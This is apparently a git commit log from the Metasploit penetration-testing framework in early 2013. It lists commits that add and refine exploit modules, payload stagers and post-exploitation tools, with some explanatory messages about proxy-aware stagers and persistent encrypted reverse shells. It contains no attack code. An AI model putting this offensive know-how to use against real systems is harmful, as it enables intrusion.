changed Platform from Windows to win
2013-03-15 15:13:52 -04:00
Doug P
8f4b3d073a
Explicitly set EXITFUNC to thread
2013-03-15 14:52:39 -04:00
Doug P
e9af05a178
made recommended changes
2013-03-15 11:35:12 -04:00
Joshua Abraham
07d78af421
Linux post module to download and run a command
2013-03-15 10:13:56 -04:00
jvazquez-r7
dc94816650
Merge branch 'master' of https://github.com/dougsko/metasploit-framework
2013-03-14 22:53:03 +01:00
Doug P
4bb64a0f41
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-14 16:10:10 -04:00
Doug P
bbbf395659
got everything working and cleaned up
2013-03-14 16:02:41 -04:00
jvazquez-r7
e21288481d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-14 16:36:04 +01:00
jvazquez-r7
d8f46e3df4
Merge branch 'module/fb_cnct_target_214' of https://github.com/zeroSteiner/metasploit-framework into zeroSteiner-module/fb_cnct_target_214
2013-03-14 16:27:58 +01:00
jvazquez-r7
3eb4505f6f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-14 16:01:40 +01:00
jvazquez-r7
b86b70c31c
Merge branch 'openpli-shell' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-openpli-shell
2013-03-14 15:58:14 +01:00
jvazquez-r7
02f90b5bbd
cleanup for dopewars
2013-03-14 15:53:19 +01:00
jvazquez-r7
4d9f2bbb06
Merge branch 'master' of https://github.com/dougsko/metasploit-framework into dougsko-master
2013-03-14 15:51:47 +01:00
jvazquez-r7
6ccfa0ec18
cleanup for dreambox_openpli_shell
2013-03-14 15:02:21 +01:00
jvazquez-r7
d3a78db77a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-14 14:12:11 +01:00
jvazquez-r7
7403239de7
cleanup for psexec_ntdsgrab
2013-03-14 13:40:45 +01:00
jvazquez-r7
9ae2c8e718
Merge branch 'ntdsgrab4' of https://github.com/R3dy/metasploit-framework into R3dy-ntdsgrab4
2013-03-14 13:39:41 +01:00
m-1-k-3
9366e3fcc5
last adjustment
2013-03-14 11:18:52 +01:00
m-1-k-3
0140caf1f0
Merge branch 'master' of git://github.com/rapid7/metasploit-framework into openpli-shell
2013-03-14 10:55:52 +01:00
Trenton Ivey
97023413cb
Added advanced option for temp filenames prefix
2013-03-14 01:50:52 -05:00
Royce Davis
abbb3b248d
methods that use @ip now reference it directly instead of being passed in as paramaters
2013-03-13 19:35:53 -05:00
Royce Davis
462ffb78c1
Simplified copy_ntds & copy_sys check on line 91
2013-03-13 19:31:36 -05:00
Royce Davis
4e9af74763
All print statements now use #{peer}
2013-03-13 19:28:09 -05:00
Royce Davis
edf2804bb5
Added simple.disconnect to end of cleanup_after method
2013-03-13 19:23:22 -05:00
Royce Davis
8eba71ebe2
Added simple.disconnect to end of download_sys_hive method
2013-03-13 19:20:58 -05:00
Doug P
1f7b2a8e9f
minor edits
2013-03-13 17:48:37 -04:00
Doug P
fa5c988110
got sami_ftpd_list.rb working
2013-03-13 17:27:02 -04:00
James Lee
2f11796dfa
Fix typo
...
[SeeRM #7800 ]
2013-03-13 16:10:20 -05:00
jvazquez-r7
456e4449e5
definitely the free trial of 6.53 is also vulnerable
2013-03-13 20:29:07 +01:00
jvazquez-r7
5345af87f2
better description according to advisory
2013-03-13 20:25:13 +01:00
jvazquez-r7
5339c6f76e
better target description according to advisory
2013-03-13 20:23:22 +01:00
jvazquez-r7
50083996ff
better target description
2013-03-13 20:13:09 +01:00
jvazquez-r7
a2755820cb
Added module for CVE-2012-4711
2013-03-13 20:07:58 +01:00
Spencer McIntyre
458ffc1f19
Add a target for Firebird 2.1.4.18393
2013-03-13 13:44:28 -04:00
jvazquez-r7
e5f7c08d6f
Added module for CVE-2012-4940
2013-03-13 11:52:54 +01:00
Doug P
22133ba8ff
removed version number
2013-03-12 16:36:14 -04:00
Doug P
70da739666
fixed errors in dopewars.rb shown by msftidy
2013-03-12 15:47:31 -04:00
jvazquez-r7
29fff62869
up to date
2013-03-12 18:29:53 +01:00
doug
b5c3161ceb
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-12 13:20:06 -04:00
Doug P
c8c50a6407
cleaned up dopewars module
2013-03-12 12:56:12 -04:00
jvazquez-r7
fea95048d8
Merge branch 'webacoo-backdoor-rce' of https://github.com/infodox/metasploit-framework
2013-03-12 17:05:17 +01:00
jvazquez-r7
91fbeda062
up to date
2013-03-12 17:04:27 +01:00
jvazquez-r7
6055438476
up to date
2013-03-12 17:04:27 +01:00
jvazquez-r7
c151d867dc
up to date
2013-03-12 17:04:27 +01:00
jvazquez-r7
6603dcd652
up to date
2013-03-12 17:04:13 +01:00
jvazquez-r7
ee98f28017
up to date
2013-03-12 16:58:48 +01:00
jvazquez-r7
5a70314f55
up to date
2013-03-12 16:57:48 +01:00
jvazquez-r7
15742c49cb
up to date
2013-03-12 16:57:48 +01:00
Patrick Webster
5312c58c72
Added BID for ms09_002_memory_corruption.
2013-03-12 16:57:47 +01:00
Patrick Webster
56bb907f9f
Fixed exceptions in ms05_054_onload exploit module.
2013-03-12 16:57:47 +01:00
Patrick Webster
1c3aa97bf8
Added Lotus Protector exploit module.
2013-03-12 16:57:47 +01:00
jvazquez-r7
1331952515
up to date
2013-03-12 16:55:06 +01:00
jvazquez-r7
6bd995f37e
up to date
2013-03-12 16:53:37 +01:00
jvazquez-r7
9891650c30
up to date
2013-03-12 16:51:00 +01:00
jvazquez-r7
8f9c4f62c8
up to date
2013-03-12 16:50:45 +01:00
jvazquez-r7
b498bf9b71
up to date
2013-03-12 16:50:35 +01:00
jvazquez-r7
74b58185cd
up to date
2013-03-12 16:48:11 +01:00
Royce Davis
9a970415bc
Module uses store_loot now instead of logdir which has been removed
2013-03-11 20:05:23 -05:00
doug
a199c397e4
...
2013-03-11 17:09:17 -04:00
doug
4d6e19b40b
small edits to dopewars.rb
2013-03-11 17:07:05 -04:00
James Lee
6da4c53191
Merge remote-tracking branch 'jvazquez-r7/netcat_gaping' into rapid7
...
[Closes #1576 ]
2013-03-11 16:02:49 -05:00
doug
0e607f8252
added dopewars module
2013-03-11 16:52:49 -04:00
jvazquez-r7
2684e6103c
use of send_request_cgi
2013-03-11 20:36:47 +01:00
jvazquez-r7
9c89599737
cleanup before merge external_ip
2013-03-11 20:35:25 +01:00
jvazquez-r7
546e24a9c6
Merge branch 'external_ip_discovery' of https://github.com/sempervictus/metasploit-framework into sempervictus-external_ip_discovery
2013-03-11 20:35:07 +01:00
Royce Davis
aa4cc11640
Removed Scanner class running as stand-alone single target module now
2013-03-11 13:39:47 -05:00
Tod Beardsley
2f95d083e8
Updating URL for Honewell EBI exploit
2013-03-11 13:35:58 -05:00
Tod Beardsley
23972fbebc
Merge branch 'release'
2013-03-11 13:08:30 -05:00
Tod Beardsley
d81d9261e7
Adding Honeywell exploit.
2013-03-11 13:03:59 -05:00
jvazquez-r7
4852f1b9f7
modify exploits to be compatible with the new netcat payloads
2013-03-11 18:35:44 +01:00
jvazquez-r7
627e7f6277
avoiding grouping options
2013-03-11 18:26:03 +01:00
jvazquez-r7
f0cee29100
modified CommandDispatcher::Exploit to have the change into account
2013-03-11 18:08:46 +01:00
jvazquez-r7
c9268c3d54
original modules renamed
2013-03-11 18:04:22 +01:00
jvazquez-r7
074ea7dee4
Merge branch 'ssl' of https://github.com/luh2/metasploit-framework into luh2-ssl
2013-03-11 15:36:20 +01:00
Royce Davis
a96753e9df
Added licensing stuff at the top
2013-03-10 20:07:04 -05:00
Royce Davis
bf9a2e4f52
Fixed module to use psexec mixin
2013-03-10 15:15:50 -05:00
Royce Davis
907983db4a
updating with r7-msf
2013-03-10 14:19:20 -05:00
Darren Martyn
73717f1522
Added webacoo code execution module
2013-03-09 19:12:22 +00:00
Spencer McIntyre
8b5a83c7f5
Remove the DECODER option
2013-03-08 15:25:16 -05:00
James Lee
2160718250
Fix file header comment
...
[See #1555 ]
2013-03-07 17:53:19 -06:00
RageLtMan
25f3f935c4
Apply Egypt's cleanup
...
Remove revision, raise the exception itself, remove scanner mixin,
datastore['RHOST'] unstead of RHOSTS, and useles agent var removed.
2013-03-07 18:34:12 -05:00
jvazquez-r7
64398d2b60
deleting some commas
2013-03-07 21:34:51 +01:00
jvazquez-r7
ab44e3e643
cleanup for fb_cnct_group
2013-03-07 21:34:07 +01:00
jvazquez-r7
969490771f
Merge branch 'module-fb_cnct_group' of https://github.com/zeroSteiner/metasploit-framework into zeroSteiner-module-fb_cnct_group
2013-03-07 21:33:33 +01:00
jvazquez-r7
c5e61f1e9d
Merge branch 'msftidy_ssl_shells' of https://github.com/sempervictus/metasploit-framework into sempervictus-msftidy_ssl_shells
2013-03-07 20:47:11 +01:00
jvazquez-r7
25db782b03
change print location
2013-03-07 19:15:40 +01:00
jvazquez-r7
fdd7c375ad
added linux native target
2013-03-07 19:12:25 +01:00
Spencer McIntyre
398d13e053
Initial commit of the Firebird CNCT Group Number Buffer Overflow.
2013-03-07 09:51:05 -05:00
jvazquez-r7
03f3b06ccb
added module for cve-2012-3001
2013-03-07 14:23:13 +01:00
J.Townsend
db1f4d7e1d
added license info
2013-03-07 00:20:02 +00:00
J.Townsend
e8c1899dc2
added license info
2013-03-07 00:18:32 +00:00
J.Townsend
3946cdf91e
added license info
2013-03-07 00:17:55 +00:00
J.Townsend
1b493d0e4c
added license info
2013-03-07 00:16:26 +00:00
J.Townsend
9e89d9608f
added license info
2013-03-07 00:11:45 +00:00
J.Townsend
56639e7f15
added license info
2013-03-07 00:10:46 +00:00
RageLtMan
7f80692457
everyone will comply, resistance is futile
2013-03-06 18:38:14 -05:00
sinn3r
b65f410048
Updates the description
2013-03-06 16:37:41 -06:00
RageLtMan
dfe3a4f394
msftidy and module placement per todb
2013-03-06 17:36:01 -05:00
sinn3r
fee07678dd
Rename module to better describe the bug.
2013-03-06 16:33:41 -06:00
sinn3r
79d3597d31
That's not a real check...
2013-03-06 16:32:53 -06:00
sinn3r
16d7b625bc
Format cleanup
2013-03-06 16:31:39 -06:00
sinn3r
7219c7b4aa
Merge branch 'codesys_gateway_server_remote_execution.rb' of github.com:nahualito/metasploit-framework into nahualito-codesys_gateway_server_remote_execution.rb
2013-03-06 16:15:24 -06:00
Royce Davis
1d8c759a34
yeah
2013-03-06 16:01:36 -06:00
Enrique A. Sanchez Montellano
aa5c9461ae
Fixed more styling issues, EOL, tabs and headers
2013-03-06 10:50:31 -08:00
Enrique A. Sanchez Montellano
437d6d6ba6
Fixed EOL, bad indent, added header, removed #!/usr/env/ruby
2013-03-06 10:44:29 -08:00
sinn3r
af9982e289
Merge branch 'codesys_gateway_server_remote_execution.rb' of github.com:nahualito/metasploit-framework into nahualito-codesys_gateway_server_remote_execution.rb
2013-03-06 12:11:58 -06:00
Enrique A. Sanchez Montellano
aa3a54fba0
Added CoDeSyS Gateway.exe Server remote execution via arbitrary file creation
2013-03-06 09:29:28 -08:00
RageLtMan
225b15f7f3
Add external IP discovery module
...
This module performs an HTTP request to ifconfig.me/ip.
The body of the response contains the publicly routable IP from
which the request originated. This can be useful in discovering
routes on pivoted hosts and initial recon as a simple aux module.
2013-03-05 23:42:31 -05:00
James Lee
ca43900a7c
Merge remote-tracking branch 'R3dy/psexec-mixin2' into rapid7
2013-03-05 16:34:11 -06:00
jvazquez-r7
781132b1cf
cleanup for openssl_aesni
2013-03-05 22:41:16 +01:00
jvazquez-r7
784c075986
Merge branch 'module-cve-2012-2686' of https://github.com/ettisan/metasploit-framework into ettisan-module-cve-2012-2686
2013-03-05 22:40:46 +01:00
James Lee
27727df415
Merge branch 'R3dy-psexec-mixin2' into rapid7
2013-03-05 14:36:55 -06:00
James Lee
a74b576a0f
Merge branch 'rapid7' into rsmudge-authproxyhttpstager
2013-03-04 17:50:48 -06:00
James Lee
c0689a7d43
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 12:14:33 -06:00
Wolfgang Ettlinger
867875b445
Beautified OpenSSL-AESNI module
...
Modifed the CVE-2012-2686 module to follow
suggestions by @jvazquez-r7:
* Added description for all fields in the
SSL packets
* MAX_TRIES now required
* use get_once instead of timeout
2013-03-04 19:09:50 +01:00
David Maloney
71ba044d03
remove debugging aid
2013-03-04 11:25:34 -06:00
David Maloney
6dcca7df78
Remove duplicated header issues
...
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
sinn3r
7fa24d9060
Module rename
2013-03-04 10:54:33 -06:00
sinn3r
59b5e8e688
Merge branch 'setuid_tunnelblick' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-setuid_tunnelblick
2013-03-04 10:53:31 -06:00
sinn3r
95cd46d362
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-04 10:46:27 -06:00
sinn3r
12247d47ba
Rename module, sorry, no pull request.
2013-03-04 10:46:05 -06:00
jvazquez-r7
e465a07030
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-04 17:41:18 +01:00
jvazquez-r7
92ee4300df
cleanup for reflective_dll_inject
2013-03-04 17:40:09 +01:00
jvazquez-r7
582395412f
Merge branch 'post_ref_dll_inj' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-post_ref_dll_inj
2013-03-04 17:39:11 +01:00
jvazquez-r7
a980bf0ef6
minor fixes
2013-03-03 19:54:17 +01:00
jvazquez-r7
248481f195
fixed EOF
2013-03-03 19:52:31 +01:00
jvazquez-r7
81e2dbc71e
added module for CVE-2012-3485
2013-03-03 19:48:12 +01:00
jvazquez-r7
76180f22fc
added module for cve-2012-4284
2013-03-03 13:23:21 +01:00
Raphael Mudge
1cc49f75f5
move flag comment to where it's used.
2013-03-03 03:26:43 -05:00
Raphael Mudge
ecdb884b13
Make download_exec work with authenticated proxies
...
Adds INTERNET_FLAG_KEEP_CONNECTION to HttpOpenRequest flags to allow
download_exec to transparently authenticate to a proxy device through
wininet.
Fun trivia, Windows 7 systems uses Connection: keep-alive by default.
This flag benefits older targets (e.g., Windows XP).
2013-03-03 01:42:17 -05:00
Michael Schierl
4a17a30ffd
Regenerate ruby modules
...
For shellcode changes (removed unneeded instruction) committed in
46a5c4f4bf
. Saves 2 bytes per shellcode.
2013-03-03 00:14:30 +01:00
David Maloney
4212c36566
Fix up basic auth madness
2013-03-01 11:59:02 -06:00
David Maloney
b2f68f0fdb
Merge branch 'dmaloney-r7-feature/http/authv2' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-dmaloney-r7-feature/http/authv2
2013-02-28 14:37:37 -06:00
David Maloney
c290bc565e
Merge branch 'master' into feature/http/authv2
2013-02-28 14:33:44 -06:00
jvazquez-r7
8f58c7b25e
cleanup for sap_icf_public_info
2013-02-28 18:47:48 +01:00
jvazquez-r7
0dcfb51071
cleanup for sap_soap_rfc_system_info
2013-02-28 18:46:18 +01:00
jvazquez-r7
1a10c27872
Merge branch 'sap_rfc_system_info' of https://github.com/ChrisJohnRiley/metasploit-framework into ChrisJohnRiley-sap_rfc_system_info
2013-02-28 18:45:42 +01:00
RageLtMan
3778ae09e9
This commit adds DNS resolution to rev_tcp_rc4
...
Due to the modular structure of payload stages its pretty trivial
to add DNS resolution instead of hard-coded IP address in stage0.
The only real complication here is that ReverseConnectRetries ends
up being one byte further down than in the original shellcode. It
appears that the original rev_tcp_dns payload suffers from the same
issue.
Hostname substitution is handled in the same method as the RC4 and
XOR keys, with an offset provided and replace_vars ignoring the
hostname.
Tested in x86 native and WOW64 on XP and 2k8r2 respectively.
This is a good option for those of us needing to leave persistent
binaries/payloads on hosts for long periods. Even if the hostname
resolves to a malicious party attempting to steal our hard earned
session, they'd be hard pressed to crypt the payload with the
appropriate RC4 pass. So long as we control the NS and records, the
hardenned shellcode should provide a better night's sleep if running
shells over the WAN. Changing the RC4 password string in the
shellcode and build.py should reduce the chances of recovery by RE.
Next step will likely be to start generating elipses for ECDH SSL
in meterpreter sessions and passing them with stage2 through the
RC4 socket. If P is 768-1024 the process is relatively quick, but
we may want to precompute a few defaults as well to have 2048+.
2013-02-28 02:59:20 -05:00
Wolfgang Ettlinger
e7015985e7
Added CVE-2012-2686
...
Added Module for a DoS issue in OpenSSL (pre 1.0.1d). Can be exploited
with services that use TLS >= 1.1 and AES-NI. Because of improper
length computation, an integer underflow occurs leading to a
segmentation fault. This module brute-forces serveral encrypted
messages - when the decrypted message coincidentally specifies a
certain value for the size, the integer underflow occurs. Though this
could be accomplished more effectively (e.g. implementing or
maninpulating and TLS implementation), this module still does what it
should do.
2013-02-27 22:57:53 +01:00
James Lee
d3b3587660
Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-27 14:01:57 -06:00
sinn3r
4085fa73c5
Merge branch 'stephenfewer-master'
2013-02-27 11:13:10 -06:00
sinn3r
3334257aa4
Merge branch 'bug/fix_screenspy' of github.com:kernelsmith/metasploit-framework into kernelsmith-bug/fix_screenspy
2013-02-26 13:54:47 -06:00
Joe Rozner
abdcde06cd
Fix polarcms_upload_exec exploit
2013-02-25 22:58:26 -08:00
sinn3r
0158919031
Merge branch 'master' of github.com:L1ghtn1ng/metasploit-framework into L1ghtn1ng-master
2013-02-25 19:41:29 -06:00
sinn3r
181e3c0496
Uses normalize_uri
2013-02-25 19:36:48 -06:00
J.Townsend
cbce1bdff2
update module description
...
This adds the version of wordpress the issue was fixed in to the description
2013-02-26 00:24:46 +00:00
James Lee
1ce86b7adb
Whitespace
2013-02-25 14:29:10 -06:00
James Lee
e41922853e
Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-25 14:15:22 -06:00
sinn3r
1ed74b46be
Add CVE-2013-0803
...
From:
http://dev.metasploit.com/redmine/issues/7691
2013-02-25 14:14:57 -06:00
sinn3r
cae1939914
Kinda too long
2013-02-25 13:44:11 -06:00
sinn3r
593be7ab2f
Merge branch 'xbmc' of github.com:mandreko/metasploit-framework into mandreko-xbmc
2013-02-25 13:43:12 -06:00
sinn3r
f3f913edc5
Correct bad naming style
2013-02-25 13:29:27 -06:00
sinn3r
690e7ec8a7
Uses normalize_uri
2013-02-25 13:28:00 -06:00
sinn3r
b930613653
Merge branch 'kordil-edms-upload-exec' of github.com:bcoles/metasploit-framework into bcoles-kordil-edms-upload-exec
2013-02-25 12:43:50 -06:00
sinn3r
5fe2c26d82
Merge branch 'bcoles-glossword_upload_exec'
2013-02-25 12:41:05 -06:00
sinn3r
52241b847a
Uses normalize_uri instead of manually adding a slash
2013-02-25 12:20:37 -06:00
Tod Beardsley
1446992253
Merge jvazquez-r7's java exploit
2013-02-25 07:19:12 -06:00
bcoles
d7c0ce4e4a
Fix 'check()' in glossword_upload_exec
2013-02-25 15:52:07 +10:30
Raphael Mudge
788c96566f
Allow HTTP stager to work with authenticated proxies
...
The HttpOpenRequest function from WinINet requires the
INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an
authenticated proxy.
From MSDN ( http://tinyurl.com/chwt86j ):
"Uses keep-alive semantics, if available, for the connection. This
flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM),
and other types of authentication."
Without this flag, the HTTP stager will fail when faced with a proxy
that requires authentication. The Windows HTTPS stager does not have
this problem.
For HTTP Meterpreter to communicate through an authenticated proxy a
separate patch will need to be made to the Meterpreter source code.
This is at line 1125 of source/common/core.c in the Meterpreter source
code.
My motivation for this request is for windows/dllinject/reverse_http
to download a DLL even when faced with an authenticated proxy. These
changes accomplish this.
Test environment:
I staged a SmoothWall device with the Advanced Proxy Web Add-on. I
enabled Integrated Windows Authentication with a W2K3 DC. I verified
the HTTP stager authenticated to and communicated through the proxy
by watching the proxy access.log
2013-02-24 17:33:00 -05:00
bcoles
1f46b3aa02
Add Glossword Arbitrary File Upload Vulnerability exploit
2013-02-25 01:59:46 +10:30
Matt Andreko
2c0a916c83
Made the password optional
2013-02-23 17:14:30 -05:00
Matt Andreko
b221711ecd
Added basic error handling
2013-02-23 10:24:04 -05:00
Matt Andreko
67c2c3da20
Code Review Feedback
...
Fixed the USER/PASS that I missed in last review
Converted from Scanner module to Gather
2013-02-23 10:09:23 -05:00
sinn3r
2b65cfa5ab
Minor changes
2013-02-22 21:02:19 -06:00
sinn3r
1623877151
Merge branch 'MS13-009' of github.com:jjarmoc/metasploit-framework into jjarmoc-MS13-009
2013-02-22 20:58:42 -06:00
Meatballs
15d505f7a9
Msftidy
2013-02-22 22:09:19 +00:00
Meatballs
0ea7247a43
Initial commit
2013-02-22 22:05:29 +00:00
James Lee
fc07bf16e7
Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-22 15:41:49 -06:00
bcoles
002654317c
Add Kordil EDMS File Upload Vulnerability exploit
2013-02-22 23:32:17 +10:30
Matt Andreko
b4f002d080
Code Review Feedback
...
Modified USER and PASS to USERNAME and PASSWORD
Moved the Scanner mixin to the bottom and removed deregister
2013-02-21 16:55:27 -05:00
James Lee
c423ad2583
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-02-21 15:30:43 -06:00
Matt Andreko
4784db3403
Fixed name
2013-02-21 15:48:41 -05:00
Matt Andreko
29cb4b1008
Merge remote-tracking branch 'upstream/master' into xbmc
2013-02-21 15:25:37 -05:00
jvazquez-r7
5b16e26f82
change module filename
2013-02-21 20:05:13 +01:00
jvazquez-r7
b4f4cdabbc
cleanup for the module
2013-02-21 20:04:05 +01:00
jvazquez-r7
1913d60d65
multibrowser support
2013-02-21 01:13:25 +01:00
jvazquez-r7
bf216cca5c
description and references updated
2013-02-20 18:14:53 +01:00
jvazquez-r7
d7b89a2228
added security level bypass
2013-02-20 17:50:47 +01:00
Royce Davis
ac50c32d51
Tested, works on server 2k8
2013-02-20 10:02:50 -06:00